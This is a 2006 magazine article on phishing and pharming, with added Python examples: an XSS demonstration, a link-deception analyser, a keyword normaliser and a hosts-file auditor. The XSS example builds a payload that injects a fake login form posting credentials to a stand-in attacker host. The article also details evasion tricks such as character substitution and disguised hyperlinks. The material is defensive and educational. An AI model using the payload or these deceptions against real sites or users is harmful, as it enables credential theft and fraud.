InfoSecurity
December 18, 2006
Phishing for Security
Runa Mukherjee
Phishing, strictly defined, is the act of sending e-mail that falsely claims to come from an established, legitimate enterprise in order to scam the recipient into surrendering private information for use in identity theft. The e-mail directs the user to a website where they are asked to "update" personal information, such as passwords and credit card, social security and bank account numbers, that the legitimate organisation already holds. The website, however, is bogus and exists only to steal the user's information. Newer scams claim that money is waiting to be collected. Prizes, holidays, electronic goods and cash have long been used to lure Internet users into visiting certain websites or enrolling in various programs; now phishing for real bank account numbers and personal information is a reality too. Here is the big picture.
NEW DELHI -- Phishing is essentially an online con game, and phishers are nothing more than tech-savvy con artists and identity thieves. They use spam, fake websites, crimeware and other techniques to trick people into divulging sensitive information, such as bank and credit card account details. Once they have captured enough victims' information, they either use the stolen data themselves to defraud the victims (by opening new accounts in the victim's name or draining the victim's bank accounts) or they sell it on the black market for a profit.
The word phishing comes from the analogy that Internet scammers use e-mail lures to fish for passwords and financial data in the sea of Internet users. The term was coined in 1996 by hackers who were stealing AOL Internet accounts by scamming passwords from unsuspecting AOL users; the hacker habit of replacing "f" with "ph" gave "phishing".
In most cases, phishers send out a wave of spam e-mail, sometimes millions of messages. Each e-mail appears to come from a well-known and trusted company. Usually the message carries the company's logo and name, and it often tries to evoke an emotional response to a false crisis. Couched in urgent, business-like language, the e-mail often requests the user's personal information outright. Sometimes it instead directs the recipient to a spoofed website. The website, like the e-mail, appears authentic, and in some instances its URL has been masked so that the web address looks real.
The bogus website urges the visitor to provide confidential information: social security numbers, account numbers, passwords and the like. Since the e-mail and corresponding website seem legitimate, the phisher hopes at least a fraction of recipients are fooled into submitting their data.
“While it is impossible to know the actual victim response rates to all phishing attacks, it is commonly believed that about 1 to 10 percent of recipients are duped, with a 'successful' phisher campaign having a response rate of around five percent. To put this in perspective, spam campaigns typically have a less than 1 percent response rate,” said Kartik Shahani, director, sales, McAfee India and SAARC.
Phishing Techniques
Besides fraudulent URLs, fraudsters use several other techniques to extract information from their targets:
- Man-in-the-middle - The fraudster sits between the victim and the real website, acting as a proxy server, and can read all traffic passing between them. To succeed, the fraudster must redirect victims to the proxy instead of the real server, using methods such as transparent proxies, DNS cache poisoning and URL obfuscation. A correctly validated HTTPS certificate would expose such a proxy, since it cannot present a valid certificate for the bank's domain, so the attack also relies on the victim clicking through certificate warnings.
- Exploitation of cross-site scripting vulnerabilities in a website - Script injected into a page of the genuine banking site lets the phisher simulate the secure login page under the bank's own address, without any anomaly visible to the user, either in the web address or in the security certificate displayed by the browser.
- Vulnerabilities in Internet Explorer - Browser bugs that, by means of an exploit, allow the address shown in the address bar to be spoofed: the browser is redirected to a fraudulent website while the address bar displays the trustworthy URL. The same class of bug allows false pop-up windows to be opened on top of legitimate websites.
Some attacks also use exploits hosted on malicious websites, which abuse vulnerabilities in Internet Explorer or the client operating system to download keylogging trojans that steal confidential user information.
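To make the cross-site scripting case above concrete, here is an added example in Python; it is not code from the original article or from any bank. It models a banking login page that reflects a ?notice= query parameter into the HTML without encoding it, the phisher's link that injects a fake "session expired" form whose action points at the phisher's server, and the same page with the parameter HTML-escaped. The host names www.genuine-site.example and www.fraud-site.example, the notice parameter and the page layout are assumptions made for the example.

```python
"""Reflected XSS on a bank's own page: the injected form sits under the
real domain and the real certificate, so the address bar and the padlock
give the victim no warning.  Added example, not the article's code."""
import re
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical bank origin; every host name here is constructed.
BANK_ORIGIN = "https://www.genuine-site.example"

# Minimal login page; {notice} is where the server reflects the parameter.
PAGE = ("<h1>Internet Banking</h1>"
        "<p>{notice}</p>"
        "<form action='/login' method='post'>"
        "<input name='user'><input name='pass' type='password'>"
        "<input type='submit' value='Log in'></form>")


def _notice_param(url):
    """The ?notice= query parameter as the server sees it (URL-decoded)."""
    return parse_qs(urlsplit(url).query).get("notice", [""])[0]


def render_login_vulnerable(url):
    """Echoes the parameter straight into the HTML: the XSS bug."""
    return PAGE.format(notice=_notice_param(url))


def render_login_fixed(url):
    """Same page with the parameter HTML-encoded before it is reflected."""
    return PAGE.format(notice=escape(_notice_param(url), quote=True))


def form_targets(html):
    """Action URL of every <form> in the rendered page, in document order."""
    return re.findall(r"<form[^>]*\saction=['\"]([^'\"]+)['\"]", html)


# The phisher's injected "session expired" form; its action points at the
# phisher's collection script (constructed host name).
PAYLOAD = ("<form action='http://www.fraud-site.example/grab' method='post'>"
           "Your session has expired, please sign in again: "
           "<input name='user'><input name='pass' type='password'>"
           "<input type='submit' value='Continue'></form>")

# The link that goes out in the phishing e-mail: genuine host, genuine
# HTTPS, attacker-controlled query string.
ATTACK_URL = f"{BANK_ORIGIN}/login?notice={quote(PAYLOAD)}"

if __name__ == "__main__":
    print("vulnerable page posts to:", form_targets(render_login_vulnerable(ATTACK_URL)))
    print("fixed page posts to:     ", form_targets(render_login_fixed(ATTACK_URL)))
```

On the vulnerable page the first form the victim sees posts to the phisher's host while the browser shows the bank's own HTTPS URL; on the fixed page the injected markup is rendered as harmless text and only the bank's own form remains. The fix generalises: every untrusted value reflected into a page must be output-encoded for the context it lands in.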
Deception Methods
- E-mail Methods - The initial phishing e-mail is designed to entice the recipient to open it and click on the link provided. Fraudsters use several methods to achieve this, including enticing subject lines, forging the sender's address, using genuine-looking images and text, and disguising the links within the e-mail.
- Deceptive Subject Lines - Phishing e-mails tend to have subject lines that appear genuinely related to the claimed sender, to entice the user to open the e-mail, for example "Important notice for all Internet Banking Users". It is also common for subject lines to substitute numerals or other letters for characters in order to bypass spam filters, such as a capital "I" in place of a lower-case "l". Some phishing e-mails deliberately misspell key words for the same reason; most people do not notice the misspelling when glancing quickly at the subject line.
- Forged Sender's Address - Forging the sender's address is an easy deception: plain SMTP does nothing to verify the From: header, so there is no guarantee that the address shown as the sender is genuine. Phishing e-mails will normally carry a forged sender's address that makes the message appear to have come from the company it claims to be from.
- Genuine-Looking Content - Phishing e-mails normally reuse the images and text styles of the legitimate website to make the message look genuine. Many consumers are fooled into thinking an e-mail is genuine simply because it carries the bank's logo. Some phishing e-mails also contain genuine links to the company's privacy policy and other pages on the legitimate website, and trust and authentication marks are duplicated to build the user's confidence in the authenticity of the e-mail.
- Disguised Hyperlinks - Links within an e-mail are deliberately disguised in another attempt to deceive the recipient. An HTML e-mail may display a genuine URL as the link text while the hyperlink itself takes the user to a different website. For example, a link displayed as "http://www.genuine-site.com" may actually take the user to "http://www.fraud-site.com". The real target can be seen by hovering over the link or viewing the message source.
- E-mail Form - The e-mail contains a form for the consumer to enter their personal information and click 'submit', 'send' or 'update'. Forms within e-mails utilise script located on a remote server to receive the information and either forward the information to the fraudsters, or place the information in a database for the fraudster to pick up later.
- Bank Account Scams - This newer scheme starts with an e-mail from a phony bank claiming that a large sum of money has been deposited into a new account opened in the recipient's name. A link to the bogus bank is included, along with an account number and a PIN code.
Next, the message explains how the user can transfer the money by logging in to this account, where the large sum is supposed to be waiting. For the transaction to take place, however, the user must submit personal information and a valid bank account, which will later be emptied.
- HTML Form Embedded in the E-mail - A variation on the e-mail form: the legitimate-looking message includes the form for entering sensitive information right in the e-mail body. This is particularly dangerous, since an HTML form inside an e-mail can do any number of things, including silently sending everything entered to a phishing site or an e-mail address owned by the phishers.
- Pop-up Windows - One other trick utilised by phishers is using pop-up windows to give the appearance of legitimacy. The actual bank's website will be opened in the background and the phishing site will be opened as a popup window. The pop-up looks like it's part of the legitimate site and it usually does not include an address bar, so it doesn't have to spoof the URL.
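The character-substitution trick in the Deceptive Subject Lines item above is countered by normalising look-alike characters before keyword matching. The Python below is an added example, not part of the original article; the keyword list and the sample subject line are constructed for it, and the substitution table is an assumption about which swaps a filter should fold together.

```python
"""Normalise look-alike characters before matching filter keywords.
Added example; keyword list and sample subject are constructed."""
import re

# Each canonical letter with the characters phishers substitute for it
# (capital I or digit 1 for lower-case l, 0 for o, 5 for s and so on).
# i and l are folded together as well: a reader cannot tell l, I and 1 apart.
LOOKALIKE_CLASSES = {
    "l": "il1|",
    "o": "o0",
    "s": "s5$",
    "e": "e3",
    "a": "a4@",
    "t": "t7",
}
_TABLE = str.maketrans({ch: canon
                        for canon, members in LOOKALIKE_CLASSES.items()
                        for ch in members})

# Constructed keyword list a mail filter might watch for.
KEYWORDS = ("internet banking", "verify", "account", "suspended", "update your")


def canonical(text):
    """Lower-case, map look-alikes to their canonical letter, squeeze spaces."""
    return re.sub(r"\s+", " ", text.lower().translate(_TABLE)).strip()


def naive_keywords(subject):
    """Plain substring match: the check the substitutions are meant to evade."""
    lowered = subject.lower()
    return [k for k in KEYWORDS if k in lowered]


def matched_keywords(subject):
    """Match after both the subject and the keywords are canonicalised."""
    subj = canonical(subject)
    return [k for k in KEYWORDS if canonical(k) in subj]


# Constructed subject line in the style the text describes.
SAMPLE_SUBJECT = "Important not1ce for a11 lnternet Bank1ng Users: ver1fy y0ur acc0unt"

if __name__ == "__main__":
    print("naive match:     ", naive_keywords(SAMPLE_SUBJECT))
    print("canonical match: ", matched_keywords(SAMPLE_SUBJECT))
```

The naive check finds nothing in the sample subject; the canonicalised check recovers three keywords. Folding characters together also folds some legitimate words into each other (bill and bi11 become identical), so a match should raise a score rather than block on its own.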
It is very difficult to tell a phishing mail from an authentic one. As Vishak Raman, country manager, India, Fortinet Inc, puts it, “It's not very easy to tell a legitimate e-mail from a phishing e-mail, and it's even more difficult when the recipients are clients of the financial entity from which the e-mail message is supposed to come.”
“Hoax e-mails are specially created to imitate legitimate ones. They are well-written, business-oriented e-mails from an apparently trusted source. These e-mails carry off the deception so well that recipients can't really differentiate them from genuine mails. Only extremely careful inspection will help one discern between a genuine e-mail and a fraudulent one. In a phishing attack, a fake but similar web page or e-mail of a bank or shopping portal pops up on a user's computer screen. This fake e-mail or website asks the user to revalidate confidential information. Busy e-mail users who receive phishing mails and are otherwise unaware of phishing often take advantage of the seemingly convenient method of updating their account online and thus provide private information directly to the intruder,” said Shubhomoy Biswas, country manager, SonicWALL India.
Identifying a Phishing Scam
- Unsolicited E-mails: Many phishing e-mails begin with a general greeting, such as "Dear Client". If your first and last names are not displayed, be suspicious and do not click on any links or buttons. The converse does not hold: a correctly spelled name proves little, since names and addresses are easy to obtain.
- False Warnings: Messages may imply a sense of urgency or immediate risk to bank accounts or credit cards if you fail to answer. For example, they may state that an unauthorised transaction has recently occurred on your account, or claim that the bank (BMO Financial Group, in the example the text draws on) is updating its records or services and requires information immediately to ensure continued access to your holdings.
- Sloppy Text and Suspicious Addresses: Phishing e-mails often contain misspellings, incorrect grammar or missing words. They may carry attachments or links to fraudulent sites designed to mimic the look and feel of a genuine site. The web address of such a site will often contain an @ symbol (the browser ignores everything before the @ and connects to the host after it, so "http://www.genuine-site.com@..." does not lead to the genuine site) or a bare numeric address (e.g. http://192.0.2.10/) in place of a domain name. The message may conclude with: "Once logged in to your account, you can transfer via wire directly to your personal bank account by clicking on the 'click here to transfer' link".
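The disguised-hyperlink sign from the Deception Methods list and the @-symbol and numeric-address signs listed just above can be checked mechanically. The Python below is an added example, not code from the article or from any vendor mentioned in it: it parses an HTML e-mail body, extracts each link's visible text and real target, and flags the three patterns. The sample message, the .example host names and the 192.0.2.10 documentation address are constructed for the example.

```python
"""Flag deceptive links in an HTML e-mail body: visible text pointing at one
host while the href goes to another, '@' user-info tricks, and raw IP hosts.
Added example; the sample message is constructed."""
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Visible link text that itself looks like a web address.
URL_LIKE = re.compile(r"^(?:https?://)?[a-z0-9-]+(?:\.[a-z0-9-]+)+(?:/\S*)?$", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_of(url):
    """Host name the browser would actually connect to, lower-cased, or None."""
    if "://" not in url:
        url = "http://" + url
    try:
        return urlsplit(url).hostname or None
    except ValueError:
        return None


def analyse_link(href, text):
    """Return the reason codes for which this link looks deceptive (may be empty)."""
    reasons = []
    parts = urlsplit(href if "://" in href else "http://" + href)
    host = parts.hostname or ""

    # http://www.bank.example@192.0.2.10/ : everything before '@' is user-info;
    # the browser connects to whatever follows it.
    if parts.username is not None:
        reasons.append("USERINFO_AT")

    # A raw IP address where a bank would normally show its domain name.
    try:
        ipaddress.ip_address(host)
        reasons.append("IP_HOST")
    except ValueError:
        pass

    # Visible text shows a URL whose host differs from where the href goes.
    if URL_LIKE.match(text):
        shown = _host_of(text)
        if shown and shown != host:
            reasons.append("TEXT_HOST_MISMATCH")
    return reasons


def analyse_email(html_body):
    """Return [(href, text, reasons)] for every link that raised at least one flag."""
    collector = _AnchorCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        reasons = analyse_link(href, text)
        if reasons:
            findings.append((href, text, reasons))
    return findings


# Constructed sample body (not a real message).
SAMPLE_BODY = """
<p>Important notice for all Internet Banking Users</p>
<p>Please visit <a href="http://www.fraud-site.example/update">http://www.genuine-site.example/update</a>
to confirm your details.</p>
<p>Or use our <a href="http://www.genuine-site.example@192.0.2.10/login">secure login</a>.</p>
<p>See our <a href="https://www.genuine-site.example/privacy">privacy policy</a>.</p>
"""

if __name__ == "__main__":
    for href, text, reasons in analyse_email(SAMPLE_BODY):
        print(f"{', '.join(reasons):28} text={text!r} href={href!r}")
```

The privacy-policy link, a genuine link of the kind phishers include to build confidence, raises no flag; the other two do. A mismatch between visible text and target is the strongest of the three signals, since a legitimate mailer has no reason to display one address and link to another.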
“Now we know the reason why this malware threat exists: it is quite cheap to launch a phishing attack, and the benefits obtained are high, even with the smallest success rate,” said Raman.
Pharming
Pharming is a more sophisticated technique. It consists of modifying the victim's name resolution, either through the TCP/IP settings (which DNS servers the machine asks) or through the local hosts file, which acts as a local cache of server names, so that the browser is sent to a forged website instead of the legitimate one when the user types the real address. If the victim browses through a proxy to remain anonymous, the proxy's own DNS resolution can be affected in the same way, so that every user of that proxy is redirected to the false server. This is another technique available to phishers.
“This is a more advanced attack where either the user's HOSTS file is modified locally to override DNS requests, or a DNS server is compromised to give out false information. The difference compared to phishing is that the domain name seen in the web browser will be the same as the real one,” said Patrick Runald, senior security specialist, F-Secure Security Labs.
On the same lines, explained Mohammed Hayath, national business development manager, India, (Network Security), Cisco: “Pharming also takes advantage of false Websites, but redirects users to the false site as they attempt to access a legitimate website. This redirection, also known as domain spoofing, can be perpetrated through an e-mailed virus that lies dormant on a PC until the user enters a specific URL, or by poisoning a domain name system (DNS) directory. A DNS translates Web and e-mail addresses into numeric strings. In a poisoned DNS, the links that associate Web addresses with numeric strings are changed so users are directed to a false website when they enter a specific URL. Any secure information entered into the false Website, such as a user name and password, is captured by hackers.”
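Of the two pharming routes described above, the local one, a modified hosts file, can be audited offline. The Python below is an added example, not code from the article or from F-Secure or Cisco: it parses a hosts file and reports any entry that pins a watched banking domain to an address. The watched-domain list and the sample hosts file are constructed; the hosts-file locations are the standard ones for Windows and Unix-like systems.

```python
"""Audit a hosts file for pharming-style overrides of banking domains.
Added example; the watched list and sample file are constructed."""
import ipaddress
import os
import sys

# Domains that should never appear in a hosts file (constructed list; a
# real deployment would use the organisation's own banks and portals).
WATCHED = ("genuine-site.example", "genuine-bank.example")


def hosts_path():
    """Default hosts-file location for the current platform."""
    if sys.platform.startswith("win"):
        root = os.environ.get("SystemRoot", r"C:\Windows")
        return os.path.join(root, "System32", "drivers", "etc", "hosts")
    return "/etc/hosts"


def parse_hosts(text):
    """Yield (address, name) for every mapping; comments and blank lines skipped."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue  # malformed line, not a mapping
        for name in fields[1:]:
            yield addr, name.lower().rstrip(".")


def _is_watched(name):
    """True for a watched domain or any of its subdomains."""
    return any(name == d or name.endswith("." + d) for d in WATCHED)


def audit_hosts(text):
    """Return [(name, address)] for every entry that overrides a watched domain.
    Any such entry is suspicious: banks never ask for hosts entries, and the
    browser will show the real domain name while talking to `address`."""
    return [(name, str(addr)) for addr, name in parse_hosts(text) if _is_watched(name)]


SAMPLE_HOSTS = """\
# Constructed sample, not a real hosts file
127.0.0.1       localhost
::1             localhost
192.168.1.20    fileserver.corp.example
# lines a pharming trojan might append (192.0.2.10 is a documentation address)
192.0.2.10      www.genuine-site.example online.genuine-site.example
"""

if __name__ == "__main__":
    source = hosts_path()
    try:
        with open(source, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
    except OSError:
        source, text = "constructed sample", SAMPLE_HOSTS
    findings = audit_hosts(text)
    for name, addr in findings:
        print(f"SUSPICIOUS ({source}): {name} pinned to {addr}")
    if not findings:
        print(f"no overrides of watched domains in {source}")
```

A poisoned DNS server leaves the hosts file clean, so this check covers only the local variant. For the other, compare the answer the system resolver gives for a bank domain with the answer from a resolver you trust, and rely on the HTTPS certificate: a pharmed server cannot present a valid certificate for the genuine domain, so the browser's certificate warning is the signal the address bar no longer gives.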
To combat Phishing
SonicWALL's Bose recommends four steps to stop attacks on the network: Detect, Protect, Align and Inform.
- Detect: Use analysis techniques designed specifically to detect fraud. Spam filters are built to let legitimate e-mail into the corporate network, so they will not stop fraudulent e-mail that looks identical to the real thing. An effective anti-fraud solution must be able to analyse the message attributes that set fraudulent e-mail apart from both spam and legitimate e-mail, and make a definitive judgment about authenticity.
- Protect: Develop containment and control procedures specifically for fraudulent e-mail, because it isn't spam. It should not sit in the spam quarantine inside the corporate network, where an employee might release it and act on it. An effective solution must segregate fraudulent e-mail immediately from other unwanted e-mail and give the IT department the option of deleting it at the network perimeter, before it reaches any recipient.
- Align: Make the anti-fraud solution part of an overall e-mail security solution rather than a stand-alone tool. It should offer options that fit other corporate security processes: the legal department may want a paper trail of all attempted fraud attacks, while corporate security may want alerts about new types of fraud as they emerge. It should also be linked into a wider network of security bodies outside the business that send out regular alerts about emerging fraud techniques, giving the IT department the best possible information and the longest possible lead time to build new defences before a new outbreak hits.
- Inform: Increase awareness of and communication about e-mail fraud throughout the organisation. The more employees know about how they are being targeted and what to do when they suspect e-mail fraud, the more likely they are to act appropriately when actually hit. An effective anti-fraud solution needs distinct fraud reporting, alert and feedback tools, so that administrators stay aware of trends, make the necessary changes at the network level and report their findings back to the other parts of the security network inside and outside the organisation. Alerts should be educational and instructional and should heighten awareness and caution. Encourage employees to report fraud or suspected fraud: the more you know, the better prepared you can be.
Anti-phishing software is available that identifies phishing content on websites, provides a toolbar that displays the real domain name of the visited site, or spots phishing attempts in e-mail. Microsoft's new IE7 browser, Mozilla's Firefox 2 and Opera from version 9.1 include a form of anti-phishing technology that checks each site against a list of known phishing sites; if the site is suspect, the software either warns the user or blocks the site outright. Firefox 2 uses Google's anti-phishing software, which can also be installed under IE6. A list-based check is only as current as the list, so it lags behind freshly registered phishing domains.
Spam filters also help protect users from phishers, because they reduce the number of phishing-related e-mails that users receive. An approach introduced in mid-2006 (similar in principle to using a hosts file to block web adverts) is to switch to a DNS service that refuses to resolve known phishing domains; because it works at the name-resolution layer, it protects any browser and any other client on the machine.
“Nowadays, sites have added verification tools that allow users to see a secret image that the user selected in advance; if the image does not appear, then the site is not legitimate. Bank of America uses this together with challenge questions, which ask the user for information that should be known only to the user and the bank. This feature (and other forms of two-way authentication and two-factor authentication) is still susceptible to attack, such as that suffered by Scandinavian bank Nordea in late 2005,” said Kartik Shahani, McAfee.
The McAfee SiteAdvisor, available as a free tool, has pioneered web safety by testing more than 95 percent of the trafficked web for spyware, adware, spam, browser attacks and online scams. These test results are used to develop site ratings which are communicated to end-users via intuitive red, yellow and green icons. More than 250 million times each day, consumers use these ratings to advise them about which sites are safe and which are not.
Runald of F-Secure believes it is home users who have to be aware. “Home users are the biggest target for phishing attacks as they are, from the attacker's point of view, easier to fool into parting with their credentials. Online banking is still safe as long as the users are aware and cautious when they're online. They also have to run an up-to-date antivirus product, an up-to-date spyware product and a firewall. The best and easiest way is to buy an Internet Security Suite that will protect against all of these types of attacks,” he said.
Conclusion
Phishing is a threat to the security of almost every sector, and home users are not safe either. The good news is that most anti-phishing tools are effective, affordable and reliable. Installing them is largely a one-time investment, after which the main ongoing work is keeping the software and its block-lists current, and the investment is worth the protection it provides.
“Usually anti-phishing technology is included in the Internet Security Suites that are available from different vendors, including our own F-Secure Internet Security 2007 product,” said Runald.
Vishak Raman of Fortinet believes self-awareness is primary. “The best way to stop yourself from being phished is to be well informed. Organisations should take special care in educating their employees about such threats, by verifying the information source and checking with the company whether they have sent any such e-mail before replying to any such mails,” he said.
Reinforcing your security has become as important as the transaction itself. Users transacting over the Internet should install security suites that block this kind of threat, apply the latest security patches available from their usual vendors, and make sure the connection is protected by HTTPS and that the site's digital certificate checks out for the domain they intended to visit.
At the end of the day, it is the information that matters to organisations, and they must ensure its safety. Phishing is a threat, but anti-phishing methods are readily available, cost-efficient and reliable. It is better to swim away from such info-security threats by acting in time than to take the bait offered by the 'phishers' and lose the most essential ingredient of a successful unit: its data.
Samples of Phishy E-mails (sidebar images not reproduced)